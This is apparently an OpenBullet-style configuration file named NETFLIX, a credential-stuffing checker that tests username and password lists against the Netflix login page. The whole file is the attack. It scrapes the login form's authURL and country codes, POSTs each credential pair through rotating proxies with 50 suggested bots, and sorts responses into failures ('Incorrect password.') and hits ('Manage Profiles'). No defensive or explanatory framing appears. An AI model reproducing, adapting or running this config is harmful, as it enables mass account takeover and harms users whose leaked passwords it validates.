[SETTINGS]
{
  "Name": "NETFLIX",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2019-07-18T08:32:03.8701498-07:00",
  "AdditionalInfo": "",
  "Author": "Dr.Amr",
  "Version": "1.3.1 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#authURL REQUEST GET "https://www.netflix.com/eg-en/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#authURL PARSE "<SOURCE>" LR "\"authURL\" value=\"" "\"" -> VAR "authURL" 

#countryCode PARSE "<SOURCE>" LR "\"countryCode\" value=\"" "\"" -> VAR "countryCode" 

PARSE "<SOURCE>" LR "\"countryIsoCode\" value=\"" "\"" -> VAR "countryIsoCode" 

#start REQUEST POST "https://www.netflix.com/eg-en/login" 
  CONTENT "userLoginId=<USER>&password=<PASS>&rememberMe=true&flow=websiteSignUp&mode=login&action=loginAction&withFields=rememberMe%2CnextPage%2CuserLoginId%2Cpassword%2CcountryCode%2CcountryIsoCode&authURL=<authURL>&nextPage=&showPassword=&countryCode=<countryCode>&countryIsoCode=<countryIsoCode>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 
  HEADER "Connection: keep-alive" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Origin: https://www.netflix.com" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Referer: https://www.netflix.com/eg-en/login" 
  HEADER "Accept-Language: en-GB,en;q=0.9,ar-EG;q=0.8,ar;q=0.7,en-US;q=0.6" 
  HEADER "Accept-Encoding: gzip, deflate" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Incorrect password." 
  KEYCHAIN Success OR 
    KEY "Manage Profiles" 

